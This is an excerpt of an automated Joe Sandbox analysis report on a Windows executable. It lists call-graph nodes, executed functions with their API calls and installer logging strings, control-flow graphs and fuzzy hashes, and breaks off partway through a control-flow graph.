56320->56321 56326 41a068 GetSysColor 56321->56326 56323 416bc3 SetBkColor 56327 41a6f0 GetSysColor CreateBrushIndirect 56323->56327 56325->56320 56326->56323 56327->56315 56328->56315 58319 4358f0 58321 435905 58319->58321 58320 43591f 58321->58320 58325 4352d8 58321->58325 58329 435322 58325->58329 58332 435308 58325->58332 58326 403400 4 API calls 58327 435727 58326->58327 58327->58320 58338 435738 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58327->58338 58328 446db4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58328->58332 58329->58326 58330 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58330->58332 58331 402648 4 API calls 58331->58332 58332->58328 58332->58329 58332->58330 58332->58331 58334 431cb0 4 API calls 58332->58334 58335 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58332->58335 58336 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58332->58336 58339 4343c0 58332->58339 58351 434b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58332->58351 58334->58332 58335->58332 58336->58332 58338->58320 58340 43447d 58339->58340 58341 4343ed 58339->58341 58370 434320 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58340->58370 58342 403494 4 API calls 58341->58342 58344 4343fb 58342->58344 58345 403778 4 API calls 58344->58345 58349 43441c 58345->58349 58346 403400 4 API calls 58347 4344cd 58346->58347 58347->58332 58348 43446f 58348->58346 58349->58348 58352 494314 58349->58352 58351->58332 58353 49434c 58352->58353 58354 4943e4 58352->58354 58355 403494 4 API calls 58353->58355 58371 448940 58354->58371 58360 494357 58355->58360 58357 494367 58358 403400 4 API calls 58357->58358 58359 494408 58358->58359 58361 403400 4 API calls 58359->58361 58360->58357 58362 4037b8 4 API calls 58360->58362 58363 494410 58361->58363 58364 494380 58362->58364 58363->58349 58364->58357 58365 4037b8 4 API calls 58364->58365 58366 4943a3 58365->58366 58367 403778 4 API calls 58366->58367 58368 4943d4 58367->58368 58369 403634 4 API calls 58368->58369 58369->58354 58370->58348 58372 448965 58371->58372 58373 4489a8 58371->58373 58374 403494 4 API calls 58372->58374 58376 4489bc 58373->58376 58383 44853c 58373->58383 58375 448970 58374->58375 58380 4037b8 4 API calls 58375->58380 58378 403400 4 API calls 58376->58378 58379 4489ef 58378->58379 58379->58357 58381 44898c 58380->58381 58382 4037b8 4 API calls 58381->58382 58382->58373 58384 403494 4 API calls 58383->58384 58385 448572 58384->58385 58386 4037b8 4 API calls 58385->58386 58387 448584 58386->58387 58388 403778 4 API calls 58387->58388 58389 4485a5 58388->58389 58390 4037b8 4 API calls 58389->58390 58391 4485bd 58390->58391 58392 403778 4 API calls 58391->58392 58393 4485e8 58392->58393 58394 4037b8 4 API calls 58393->58394 58405 448600 58394->58405 58395 448638 58397 403420 4 API calls 58395->58397 58396 4486d3 58400 4486db GetProcAddress 58396->58400 58401 448718 58397->58401 58398 44865b LoadLibraryExA 58398->58405 58399 44866d LoadLibraryA 58399->58405 58402 4486ee 58400->58402 58401->58376 58402->58395 58403 403b80 4 API calls 58403->58405 58404 403450 4 API calls 58404->58405 58405->58395 58405->58396 58405->58398 58405->58399 58405->58403 58405->58404 58407 43da98 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58405->58407 58407->58405 58408 40ce34 58411 406f18 WriteFile 58408->58411 58412 406f35 58411->58412 56329 416654 56330 416661 56329->56330 56331 4166bb 56329->56331 56337 4162da 56330->56337 56341 416560 CreateWindowExA 56330->56341 56332 416668 SetPropA SetPropA 56332->56331 56333 41669b 56332->56333 56334 4166ae SetWindowPos 56333->56334 56334->56331 56338 416306 56337->56338 56339 4162e6 GetClassInfoA 56337->56339 56338->56332 56339->56338 56340 4162fa GetClassInfoA 56339->56340 56340->56338 56341->56332 58413 4222f4 58414 422303 58413->58414 58419 421284 58414->58419 58417 422323 58420 4212f3 58419->58420 58421 421293 58419->58421 58422 421304 58420->58422 58444 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 58420->58444 58421->58420 58443 408d34 19 API calls 58421->58443 58424 421332 58422->58424 58425 4213ca 58422->58425 58427 4213a5 58424->58427 58432 42134d 58424->58432 58426 4213a3 58425->58426 58430 4213de SetMenu 58425->58430 58428 4213f6 58426->58428 58446 421e3c 11 API calls 58426->58446 58427->58426 58434 4213b9 58427->58434 58447 4211cc 10 API calls 58428->58447 58430->58426 58432->58426 58437 421370 GetMenu 58432->58437 58433 4213fd 58433->58417 58442 4221f8 10 API calls 58433->58442 58436 4213c2 SetMenu 58434->58436 58436->58426 58438 421393 58437->58438 58439 42137a 58437->58439 58445 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 58438->58445 58441 42138d SetMenu 58439->58441 58441->58438 58442->58417 58443->58421 58444->58422 58445->58426 58446->58428 58447->58433 58448 44b4b8 58449 44b4c6 58448->58449 58451 44b4e5 58448->58451 58450 44b39c 11 API calls 58449->58450 58449->58451 58450->58451 58452 448738 58453 44876d 58452->58453 58465 448766 58452->58465 58454 448781 58453->58454 58457 44853c 7 API calls 58453->58457 58455 403494 4 API calls 58454->58455 58454->58465 58458 44879a 58455->58458 58456 403400 4 API calls 58459 448917 58456->58459 58457->58454 58460 4037b8 4 API calls 58458->58460 58461 4487b6 58460->58461 58462 4037b8 4 API calls 58461->58462 58463 4487d2 58462->58463 58464 4487e6 58463->58464 58463->58465 58466 4037b8 4 API calls 58464->58466 58465->58456 58467 448800 58466->58467 58468 431be0 4 API calls 58467->58468 58469 448822 58468->58469 58470 431cb0 4 API calls 58469->58470 58476 448842 58469->58476 58470->58469 58471 448898 58484 442344 58471->58484 58473 448880 58473->58471 58496 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58473->58496 58475 4488cc GetLastError 58497 4484d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58475->58497 58476->58473 58495 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58476->58495 58479 4488db 58498 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58479->58498 58481 4488f0 58499 443630 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58481->58499 58483 4488f8 58485 443322 58484->58485 58486 44237d 58484->58486 58488 403400 4 API calls 58485->58488 58487 403400 4 API calls 58486->58487 58489 442385 58487->58489 58490 443337 58488->58490 58491 431be0 4 API calls 58489->58491 58490->58475 58492 442391 58491->58492 58493 443312 58492->58493 58500 441a1c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58492->58500 58493->58475 58495->58476 58496->58471 58497->58479 58498->58481 58499->58483 58500->58492 58501 4165fc 73A15CF0 58502 42e3ff SetErrorMode

                                                                                                      Executed Functions

                                                                                                      Function 00470950 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Installing the file., xrefs: 004711B1
                                                                                                      • Will register the file (a DLL/OCX) later., xrefs: 004717AD
                                                                                                      • Dest file exists., xrefs: 00470C63
                                                                                                      • Incrementing shared file count (64-bit)., xrefs: 0047181A
                                                                                                      • Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
                                                                                                      • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
                                                                                                      • Incrementing shared file count (32-bit)., xrefs: 00471833
                                                                                                      • Version of our file: %u.%u.%u.%u, xrefs: 00470D98
                                                                                                      • Time stamp of existing file: (failed to read), xrefs: 00470CDF
                                                                                                      • Uninstaller requires administrator: %s, xrefs: 0047141D
                                                                                                      • Same version. Skipping., xrefs: 00470F8D
                                                                                                      • Existing file has a later time stamp. Skipping., xrefs: 00471077
                                                                                                      • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
                                                                                                      • -- File entry --, xrefs: 004709A3
                                                                                                      • Version of our file: (none), xrefs: 00470DA4
                                                                                                      • Version of existing file: (none), xrefs: 00470FA2
                                                                                                      • @, xrefs: 00470A58
                                                                                                      • Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
                                                                                                      • Non-default bitness: 32-bit, xrefs: 00470B63
                                                                                                      • Will register the file (a type library) later., xrefs: 004717A1
                                                                                                      • .tmp, xrefs: 0047125F
                                                                                                      • Dest filename: %s, xrefs: 00470B3C
                                                                                                      • Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                                                                      • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                                                                      • Non-default bitness: 64-bit, xrefs: 00470B57
                                                                                                      • Time stamp of existing file: %s, xrefs: 00470CD3
                                                                                                      • Time stamp of our file: %s, xrefs: 00470C43
                                                                                                      • , xrefs: 00470E77, 00471048, 004710C6
                                                                                                      • Failed to strip read-only attribute., xrefs: 0047117B
                                                                                                      • Installing into GAC, xrefs: 004719A2
                                                                                                      • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                                                                      • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                                                                      • InUn, xrefs: 004713ED
                                                                                                      • Stripped read-only attribute., xrefs: 0047116F
                                                                                                      • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                                                                      • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                                                                      • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                                                                      • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                                                                      • Same time stamp. Skipping., xrefs: 00470FFD
                                                                                                      • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                      • API String ID: 0-4021121268
                                                                                                      • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                                      • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                                                                      • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                                      • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59
                                                                                                      Function 0042E0AC Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1546 42e0ac-42e0bd 1547 42e0c8-42e0ed AllocateAndInitializeSid 1546->1547 1548 42e0bf-42e0c3 1546->1548 1549 42e297-42e29f 1547->1549 1550 42e0f3-42e110 GetVersion 1547->1550 1548->1549 1551 42e112-42e127 GetModuleHandleA GetProcAddress 1550->1551 1552 42e129-42e12b 1550->1552 1551->1552 1553 42e152-42e16c GetCurrentThread OpenThreadToken 1552->1553 1554 42e12d-42e13b CheckTokenMembership 1552->1554 1557 42e1a3-42e1cb GetTokenInformation 1553->1557 1558 42e16e-42e178 GetLastError 1553->1558 1555 42e141-42e14d 1554->1555 1556 42e279-42e28f FreeSid 1554->1556 1555->1556 1559 42e1e6-42e20a call 402648 GetTokenInformation 1557->1559 1560 42e1cd-42e1d5 GetLastError 1557->1560 1561 42e184-42e197 GetCurrentProcess OpenProcessToken 1558->1561 1562 42e17a-42e17f call 4031bc 1558->1562 1573 42e218-42e220 1559->1573 1574 42e20c-42e216 call 4031bc * 2 1559->1574 1560->1559 1564 42e1d7-42e1e1 call 4031bc * 2 1560->1564 1561->1557 1563 42e199-42e19e call 4031bc 1561->1563 1562->1549 1563->1549 1564->1549 1576 42e222-42e223 1573->1576 1577 42e253-42e271 call 402660 CloseHandle 1573->1577 1574->1549 1580 42e225-42e238 EqualSid 1576->1580 1584 42e23a-42e247 1580->1584 1585 42e24f-42e251 1580->1585 1584->1585 1588 42e249-42e24d 1584->1588 1585->1577 1585->1580 1588->1577
                                                                                                      APIs
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                                      • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                                      • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                      • API String ID: 2252812187-1888249752
                                                                                                      • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                                      • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                                                      • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                                      • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D
                                                                                                      Function 004502AC Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmStartSession), ref: 004502F5
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmRegisterResources), ref: 0045030A
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmGetList), ref: 0045031F
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmShutdown), ref: 00450334
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmRestart), ref: 00450349
                                                                                                      • GetProcAddress.KERNEL32(6F9C0000,RmEndSession), ref: 0045035E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                      • API String ID: 1968650500-3419246398
                                                                                                      • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                                      • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                                                      • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                                      • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C
                                                                                                      Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1674 423c1c-423c50 1675 423c52-423c53 1674->1675 1676 423c84-423c9b call 423b78 1674->1676 1678 423c55-423c71 call 40b44c 1675->1678 1681 423cfc-423d01 1676->1681 1682 423c9d 1676->1682 1710 423c73-423c7b 1678->1710 1711 423c80-423c82 1678->1711 1684 423d03 1681->1684 1685 423d37-423d3c 1681->1685 1686 423ca3-423ca6 1682->1686 1687 423d60-423d70 1682->1687 1688 423fc1-423fc9 1684->1688 1689 423d09-423d11 1684->1689 1692 423d42-423d45 1685->1692 1693 4240aa-4240b8 IsIconic 1685->1693 1690 423cd5-423cd8 1686->1690 1691 423ca8 1686->1691 1694 423d72-423d77 1687->1694 1695 423d7b-423d83 call 4241a4 1687->1695 1699 424162-42416a 1688->1699 1705 423fcf-423fda call 4181f0 1688->1705 1697 423f23-423f4a SendMessageA 1689->1697 1698 423d17-423d1c 1689->1698 1706 423db9-423dc0 1690->1706 1707 423cde-423cdf 1690->1707 1701 423e06-423e16 call 423b94 1691->1701 1702 423cae-423cb1 1691->1702 1703 4240e6-4240fb call 424860 1692->1703 1704 423d4b-423d4c 1692->1704 1693->1699 1700 4240be-4240c9 GetFocus 1693->1700 1708 423d88-423d90 call 4241ec 1694->1708 1709 423d79-423d9c call 423b94 1694->1709 1695->1699 1697->1699 1713 423d22-423d23 1698->1713 1714 42405a-424065 1698->1714 1715 424181-424187 1699->1715 1700->1699 1722 4240cf-4240d8 call 41f004 1700->1722 1701->1699 1723 423cb7-423cba 1702->1723 1724 423e2e-423e4a PostMessageA call 423b94 1702->1724 1703->1699 1717 423d52-423d55 1704->1717 1718 4240fd-424104 1704->1718 1705->1699 1766 423fe0-423fef call 4181f0 IsWindowEnabled 1705->1766 1706->1699 1727 423dc6-423dcd 1706->1727 1728 423ce5-423ce8 1707->1728 1729 423f4f-423f56 1707->1729 1708->1699 1709->1699 1710->1715 1711->1676 1711->1678 1730 424082-42408d 1713->1730 1731 423d29-423d2c 1713->1731 1714->1699 1733 42406b-42407d 1714->1733 1734 424130-424137 1717->1734 1735 423d5b 1717->1735 1744 424106-424119 call 4244e4 1718->1744 1745 42411b-42412e call 42453c 1718->1745 1722->1699 1780 4240de-4240e4 SetFocus 1722->1780 1741 423cc0-423cc3 1723->1741 1742 423eb5-423ebc 1723->1742 1724->1699 1727->1699 1747 423dd3-423dd9 1727->1747 1748 423cee-423cf1 1728->1748 1749 423e4f-423e6f call 423b94 1728->1749 1729->1699 1737 423f5c-423f61 call 404e54 1729->1737 1730->1699 1755 424093-4240a5 1730->1755 1752 423d32 1731->1752 1753 423f66-423f6e 1731->1753 1733->1699 1750 42414a-424159 1734->1750 1751 424139-424148 1734->1751 1754 42415b-42415c call 423b94 1735->1754 1737->1699 1761 423cc9-423cca 1741->1761 1762 423dde-423dec IsIconic 1741->1762 1763 423ebe-423ed1 call 423b24 1742->1763 1764 423eef-423f00 call 423b94 1742->1764 1744->1699 1745->1699 1747->1699 1767 423cf7 1748->1767 1768 423e1b-423e29 call 424188 1748->1768 1795 423e93-423eb0 call 423a94 PostMessageA 1749->1795 1796 423e71-423e8e call 423b24 PostMessageA 1749->1796 1750->1699 1751->1699 1752->1754 1753->1699 1778 423f74-423f7b 1753->1778 1791 424161 1754->1791 1755->1699 1781 423cd0 1761->1781 1782 423da1-423da9 1761->1782 1771 423dfa-423e01 call 423b94 1762->1771 1772 423dee-423df5 call 423bd0 1762->1772 1808 423ee3-423eea call 423b94 1763->1808 1809 423ed3-423edd call 41ef68 1763->1809 1802 423f02-423f08 call 41eeb4 1764->1802 1803 423f16-423f1e call 423a94 1764->1803 1766->1699 1799 423ff5-424004 call 4181f0 IsWindowVisible 1766->1799 1767->1754 1768->1699 1771->1699 1772->1699 1778->1699 1794 423f81-423f90 call 4181f0 IsWindowEnabled 1778->1794 1780->1699 1781->1754 1782->1699 1797 423daf-423db4 call 422c5c 1782->1797 1791->1699 1794->1699 1823 423f96-423fac call 412320 1794->1823 1795->1699 1796->1699 1797->1699 1799->1699 1825 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1799->1825 1821 423f0d-423f10 1802->1821 1803->1699 1808->1699 1809->1808 1821->1803 1823->1699 1830 423fb2-423fbc 1823->1830 1825->1699 1830->1699
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                                      • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                                                                      • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                                      • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08
                                                                                                      Function 00467710 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1649windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1989 467710-467726 1990 467730-4677e7 call 49514c call 402b30 * 6 1989->1990 1991 467728-46772b call 402d30 1989->1991 2008 467824-46783d 1990->2008 2009 4677e9-467810 call 41464c 1990->2009 1991->1990 2015 46783f-467866 call 41462c 2008->2015 2016 46787a-467888 call 495454 2008->2016 2013 467815-46781f call 41460c 2009->2013 2014 467812 2009->2014 2013->2008 2014->2013 2024 46786b-467875 call 4145ec 2015->2024 2025 467868 2015->2025 2022 46788a-467899 call 49529c 2016->2022 2023 46789b-46789d call 4953c0 2016->2023 2030 4678a2-4678f5 call 494db0 call 41a3e0 * 2 2022->2030 2023->2030 2024->2016 2025->2024 2037 467906-46791b call 451444 call 414b28 2030->2037 2038 4678f7-467904 call 414b28 2030->2038 2043 467920-467927 2037->2043 2038->2043 2045 46796f-467df5 call 4951ec call 495510 call 41462c * 3 call 4146cc call 4145ec * 3 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f80 call 460fd4 LoadBitmapA call 41d6c0 call 460fa4 call 460fbc call 4674ec call 469000 call 466b6c call 40357c call 414b28 call 466ea4 call 466eac call 466b6c call 40357c * 2 call 414b28 call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 414b28 * 2 call 469000 call 414b28 * 2 call 466ea4 call 41460c call 466ea4 call 41460c call 469000 call 414b28 call 466ea4 call 466eac call 469000 call 414b28 call 466ea4 call 41460c * 2 call 414b28 call 466ea4 call 41460c 2043->2045 2046 467929-46796a call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2043->2046 2176 467df7-467e4f call 41460c call 414b28 call 466ea4 call 41460c 2045->2176 2177 467e51-467e6a call 414a54 * 2 2045->2177 2046->2045 2184 467e6f-467f20 call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2176->2184 2177->2184 2203 467f22-467f3d 2184->2203 2204 467f5a-468190 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 4181f0 call 42ed48 call 414b28 call 4951ec call 495510 call 41462c call 466b6c call 414b28 call 466ea4 call 41460c call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 41460c call 466eac call 466b6c call 414b28 call 466ea4 2184->2204 2205 467f42-467f55 call 41460c 2203->2205 2206 467f3f 2203->2206 2265 468192-46819b 2204->2265 2266 4681d1-46828a call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2204->2266 2205->2204 2206->2205 2265->2266 2267 46819d-4681cc call 414a54 call 466eac 2265->2267 2284 4682c4-4686e5 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 414b28 call 4951ec call 495510 call 41462c call 414b28 call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 42bbe0 call 495520 call 44e8c0 call 466b6c call 469000 call 466b6c call 469000 call 466b6c call 469000 * 2 call 414b28 call 466ea4 call 466eac call 469000 call 494db0 call 41a3e0 call 466b6c call 40357c call 414b28 call 466ea4 call 41460c call 414b28 * 2 call 495520 call 403494 call 40357c * 2 call 414b28 2266->2284 2285 46828c-4682a7 2266->2285 2267->2266 2384 4686e7-468704 call 44ffc8 call 450124 2284->2384 2385 468709-468710 2284->2385 2286 4682ac-4682bf call 41460c 2285->2286 2287 4682a9 2285->2287 2286->2284 2287->2286 2384->2385 2386 468734-46873b 2385->2386 2387 468712-46872f call 44ffc8 call 450124 2385->2387 2391 46875f-4687a5 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4690f4 2386->2391 2392 46873d-46875a call 44ffc8 call 450124 2386->2392 2387->2386 2405 4687a7-4687ae 2391->2405 2406 4687bf 2391->2406 2392->2391 2407 4687b0-4687b9 2405->2407 2408 4687bb-4687bd 2405->2408 2409 4687c1-4687d0 2406->2409 2407->2406 2407->2408 2408->2409 2410 4687d2-4687d9 2409->2410 2411 4687ea 2409->2411 2412 4687e6-4687e8 2410->2412 2413 4687db-4687e4 2410->2413 2414 4687ec-468806 2411->2414 2412->2414 2413->2411 2413->2412 2415 4688af-4688b6 2414->2415 2416 